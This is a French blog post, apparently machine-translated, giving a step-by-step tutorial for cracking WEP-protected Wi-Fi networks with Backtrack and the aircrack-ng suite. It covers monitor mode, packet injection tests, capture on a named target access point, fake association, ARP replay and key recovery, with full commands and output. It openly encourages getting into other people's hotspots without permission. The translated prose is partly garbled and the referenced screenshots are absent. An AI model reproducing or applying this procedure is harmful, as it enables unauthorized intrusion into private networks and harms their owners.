Craquage WEP avec Backtrack: actions Wi-Fi au cours de l'été

Les gens veulent partager leur connexion Wi-Fi avec nous en tant que bénévoles et que Fon n'aide pas beaucoup (il ya combien de temps ne voit pas d'un réseau de FON? Avez-vous déjà vu? ), Nous laisse souvent libre accès à leurs hotspots. Si cela n'explique toujours pas aujourd'hui plus de la moitié de l'accès sans fil sont configurés à l'aide d'un système de cryptage, WEP , ce qui permet le libre passage que quatre ou cinq minutes. Un "nice" détail afin de ne pas dépenser plus sur votre facture de téléphone et de ramasser votre courrier ou de se connecter à Facebook pour rendre jaloux pendant les vacances.

La partie la plus délicate de tout ce que nous avons est d'avoir une carte réseau est bien avec les pilotes appropriés pour notre tâche. La carte (le matériel) ne vaut pas beaucoup réfléchi. Si nous avons servi, tant mieux. Sinon, nous devrons acheter adéquates . Les pilotes peuvent être compilées pour toutes les distributions Linux, mais pas la peine de faire: J'ai installé Backtrack sur une petite partition de 15 Go de mon ordinateur portable à ces fins et si vous n'avez pas n'épargne même l'espace que vous pouvez utiliser une version live de cette distribution sur une clé USB. Si vous êtes de bronzage dans ce monde et préfèrent compiler les pilotes vous à votre distribution d'habitude, aller de l'avant. Dans ce dernier cas d'avoir de la suite aircrack-ng ne sera pas difficile. Pour l'ensemble du processus au moins deux terminaux doivent simultanément, mais est indistincte que nous n'avons à travers un environnement graphique ( startx ) ou en utilisant virruales terminaux ( Ctrl+Alt+Fn ).

Et nous commençons avec les préliminaires. Nous avons déjà commencé notre marche arrière et nous allons vérifier que votre carte est compatible avec les pilotes madwifi, et si oui, pour initialiser. Pour ce faire nous utilisons la commande iwconfig pour voir cette carte a des extensions sans fil et ifconfig pour connaître l'adresse MAC (HWaddr) de celle-ci:

root@bt:~# iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wlan0 IEEE 802.11bgn Mode:Managed Access Point: Not-Associated
Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off

root@bt:~# ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 1c:4b:d6:a3:52:2a
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

Dans la décharge précédente, nous voyons que le nom de notre carte est wlan0 et votre adresse MAC est l' 1c:4b:d6:a3:52:2a . Bon. Maintenant initialiser notre carte en mode moniteur:

root@bt:~# airmon-ng stop wlan0

Interface Chipset Driver
wlan0 Atheros ath9k - [phy0]
(monitor mode disabled)

root@bt:~# airmon-ng start wlan0

Interface Chipset Driver
wlan0 Atheros ath9k - [phy0]
(monitor mode enabled on mon0 )

Et maintenant voir qui est approprié pour notre travail. Dans la dernière ligne de la suite aircrack commande précédente nous a donné l'identité de notre adaptateur sans fil en mode moniteur que nous utiliserons à partir de maintenant. La commande suivante nous dira si cet appareil est capable d'injecter des paquets sur un réseau sans fil et mettra à l'épreuve l'habileté »avec trois des dispositifs capables de détecter:

root@bt:~# aireplay-ng --test mon0
14:20:50 Trying broadcast probe requests...
14:20:50 Injection is working!
14:20:52 Found 3 APs

14:20:52 Trying directed probe requests...
14:20:52 00:03:C9:8D:0C:04 - channel: 1 - 'La cueva de Moratalaz'
14:20:52 Ping (min/avg/max):
1.644ms/3.040ms/6.560ms Power: -28.13
14:20:52 30/30: 100%

14:20:52 00:1F:5B:89:4B:BE - channel: 2 - 'Apple Network'
14:20:53 Ping (min/avg/max): 2.183ms/22.288ms/87.101ms Power: -75.30
14:20:53 30/30: 100%

14:20:53 00:1F:E1:2A:79:74 - channel: 1 - 'Livebox-DBB0'
14:20:58 Ping (min/avg/max): 2.218ms/3.187ms/4.387ms Power: -90.40
14:20:58 5/30: 16%

Et que les préliminaires. Si le test ci-dessus ont échoué, nous n'avons rien à faire et aurait pour vérifier que la faute ci-dessus jusqu'à présent. Voyons maintenant choisir notre objectif "." Nous allons utiliser la commande suivante;

root@bt:~# airodump-ng mon0

La sortie aura un écran avec les réseaux détectés par notre carte et différentes mesures de la qualité du signal est, la même activité, cryptage, etc. Voyons voir une capture d'écran (cliquez pour agrandir):

Ce que nous devons rechercher en choisissant cible? Bien sûr, dans le cryptage WEP (AUTH colonne) et dans les environs du signal (identifié par un numéro en décibels en dessous de la colonne PWR). Il faut aussi le BSSID du point d'accès (votre Mac), le canal dans lequel il opère (colonne CH) et le réseau (colonne ESSID) ID. En appuyant sur Ctrl + C quand nous avons suffisamment d'exécution des données est interrompu et ne peut copier ces données avec la facilité. Colonne # données est particulièrement important parce que nous ne pouvons pas entrer dans un réseau qui n'est pas actif, il est donc inutile d'essayer d'introduire un zéro dans cette colonne. Dans ce cas, vous devez attendre que le propriétaire à utiliser. Expliquez plus tard pourquoi.

L'étape suivante consiste à "capturer" ID réseau et kits choisi enregistrer dans un fichier. Si nous choisissons le réseau identifié comme la capture ci-dessus DJC la commande serait:

root@bt:~# airodump-ng -c 3 -w djc --bssid 00:13:f7:df:a4:0d mon0

Lorsque la période mentionnée canal (3), les fichiers suivants, qui sont stockées dans les captures (AD) et le MAC de la cible (00:13: f7: DF: A4: 0d). La sortie doit être quelque chose comme:

La colonne la plus importante ici est étiqueté comme # données qui montrent que le nombre de paquets capturés IVs. Rattraper ici correspond à une série de sept minutes (trop pour ce qu'il nous faut), mais d'abord nous allons voir comment décevante progresse très, très lent. D'autant plus que nous aurons besoin entre 5.000 et 10.000 paquets pour accéder au mot de passe. Maintenant nous allons voir comment l'exécuter ...

Nous sommes partis d'exécuter la commande précédente et a ouvert un nouveau terminal à partir duquel d'associer notre adaptateur sans fil à l'objectif du point d'accès dans l'ordre suivant:

root@bt:~# aireplay-ng -1 0 -a 00:13:f7:df:a4:0d -h 1c:4b:d6:a3:52:2a -e DJC mon0

Le premier MAC (00:13: f7: DF: A4: 0d) est notre but et le second (1c: 4b: D6: A3: 52:2 a) la carte que nous utilisons pour s'y connecter. L'ID du réseau cible reste DJC. À ce stade, il peut arriver que n'a pas réussi à faire fonctionner l'association. C'est parce que normalement le point d'accès est le filtrage par MAC ou nous sommes trop loin de là. Le premier a une solution, mais nous allons voir dans un autre article qui est déjà devenu trop billet. Une fois que nous avons fait à l'association d'augmenter ce nombre de paquets qui ont besoin d'IVs pour casser le mot de passe. Comment? Ainsi, profitant des paquets ARP sont envoyés en mode de diffusion et contenir une IV (vecteur d'initialisation) c'est ce que nous avons besoin. Nous ferons notre adaptateur d'écouter et d'attendre de tels emballages et réinjecté dans le réseau pour accélérer le processus afin que dans seulement quelques minutes, nous aurons plusieurs milliers d'entre eux. La commande pour contiunación:

root@bt:~# aireplay-ng -3 -b 00:13:f7:df:a4:0d -h 1c:4b:d6:a3:52:2a mon0

L'AMC continue d'être le premier point d'accès et le second de notre adaptateur. Le résultat des deux dernières commandes sont ici:

Si tout va bien nous allons voir comment le nombre de paquets capturés IV commence à déborder, alors allez à l'étape finale. Nous avons ouvert un troisième terminal et d'exécuter ce qui suit:

root@bt:~# aircrack-ng -b 00:13:f7:df:a4:0d djc-01.cap

Cela permet de lancer l'attaque pour déchiffrer le mot de passe pour le réseau défini par le MAC 00:13: f7: DF: A4: 0d de paquets capturés et stockés dans le fichier-01.cap DJC (rappelez-vous que la racine introduit DJC nous). Si aircrack n'a pas suffisamment d'informations pour casser le mot de passe est mis en attente à quelques centaines de plus et de relancer automatiquement. S'il ya des problèmes que nous réagir rapidement avec quelque chose comme ça où le besoin est la clé à la fin et étiquetés comme ASCII:

Ne soyez pas alarmé par la longueur du texte. Je voulais qu'il soit facilement compréhensible et reproductible par presque tout le monde et alors je suis plus la littérature sur le compte, mais une fois que vous avez pratiqué une couple de fois que vous pouvez compléter l'ensemble du processus en seulement quelques minutes. Et donnons-Merci à Telefonica pour poursuivre l'installation de vos points d'accès utilisant le protocole WEP